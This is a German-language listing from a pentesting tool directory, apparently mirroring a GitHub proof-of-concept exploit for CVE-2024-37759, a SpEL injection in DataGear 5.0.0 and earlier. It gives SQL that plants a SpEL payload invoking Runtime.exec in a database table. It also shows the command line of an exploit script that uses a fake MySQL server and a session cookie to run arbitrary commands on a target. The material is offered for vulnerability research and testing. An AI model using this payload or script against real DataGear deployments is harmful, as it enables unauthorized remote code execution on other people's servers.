Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-37759_PoC — Proof-of-Concept-Exploit für CVE-2024-37759, eine SpEL-Injection-Sicherheitslücke in DataGear 5.0.0 und früher, die Remote-Code-Ausführung über präparierte Datenbanktabellen ermöglicht. | Kitploit
Tools/GitHubGitHub/crumbledwall/cve-2024-37759_poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubcrumbledwall/cve-2024-37759_poc

CVE-2024-37759_PoC

Proof-of-Concept-Exploit für CVE-2024-37759, eine SpEL-Injection-Sicherheitslücke in DataGear 5.0.0 und früher, die Remote-Code-Ausführung über präparierte Datenbanktabellen ermöglicht.

Repository anzeigen
515vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-37759 PoC

Beschreibung

DataGear Version 5.0.0 und früher weist eine Schwachstelle für SpEL-Ausdruckseinschleusung auf, die zu Remote-Code-Ausführung führt.

Exploit

CVE-Exploit-Details

Wenn Sie die Schnittstelle /data/{schemaId}/{tableName}/view aufrufen und die Datenbanktabelle keinen Primärschlüssel hat, kann ein Angreifer einen bösartigen SpEL-Ausdruck in das data-Feld einschleusen. Wenn die Schaltfläche "view" angeklickt wird, wird der SpEL-Ausdruck ausgeführt.

Um den Angriff durchzuführen, können Sie eine bösartige Datenbanktabelle wie folgt erstellen:

CREATE DATABASE evil;

CREATE TABLE `evil` (
  `name` varchar(209) COLLATE utf8mb4_unicode_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

INSERT INTO `evil` VALUES ("#{T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('calc')}");

Melden Sie sich dann an und fügen Sie diese MySQL-Datenbank in der Schema-Hinzufügen-Schnittstelle hinzu: /schema/saveAdd. Klicken Sie anschließend auf die Schaltfläche "view", und der SpEL-Ausdruck wird ausgeführt.

Nutzung des Exploits

Dieser Exploit ist eine Modifikation von MySQL_Fake_Server. Melden Sie sich zuerst am Portal an und holen Sie sich das Cookie "JSESSIONID". Anschließend können Sie diesen Exploit verwenden, um Befehle automatisch auszuführen.

Das Argument -t gibt die angreifbare Zielseite an, -o gibt die öffentliche IP-Adresse an, unter der der MySQL-Fake-Server erreichbar ist, -p steht für den Fake-Server-Port, -s für den Cookie-Wert von "JSESSIONID" und -c gibt den auszuführenden Befehl an.

python3.7 exp.py -t "http://localhost:50401" -o "192.168.25.130" -p "3306" -s "B751A41FBE8C3385B386B2365C2FB86D" -c "calc"
Tool herunterladen